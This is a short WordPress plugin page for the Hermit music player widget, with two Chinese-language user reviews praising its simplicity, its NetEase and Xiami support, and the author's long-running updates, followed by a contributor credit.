知道该插件已经是好几年前了，之后很少有机会在网上写博客了，所以可能就不会再用到这个插件了，直到前几天又要做个小东西，我想到了这个插件，发现作者还在更新，百感交集，先不谈插件好不好，单单作者这份坚持和用心，就已经打动了我，当然，作者写的插件易用小巧，适用多环境下，这也是我第一次给WordPress widget评价，对作者的坚持表示敬佩和感谢。 PS：如果能支持一下微信小程序就更好了，现在我是通过Webview来使用的，经过简单的模板适配，依然适用！

用了两年了，作者一直有在不断更新！这是目前能用的到的最简洁、美观、实用的音乐播放插件，支持网易和虾米。虽然还有一部分音乐版权在QQ音乐手上，但是已经知足了，毕竟同类可以调用三者的插件UI简直辣眼睛。

Read all 4 reviews

“Hermit 音乐播放器” is open source software. The following people have contributed to this plugin.

Contributors

*    mu feng

Tag

#wordpress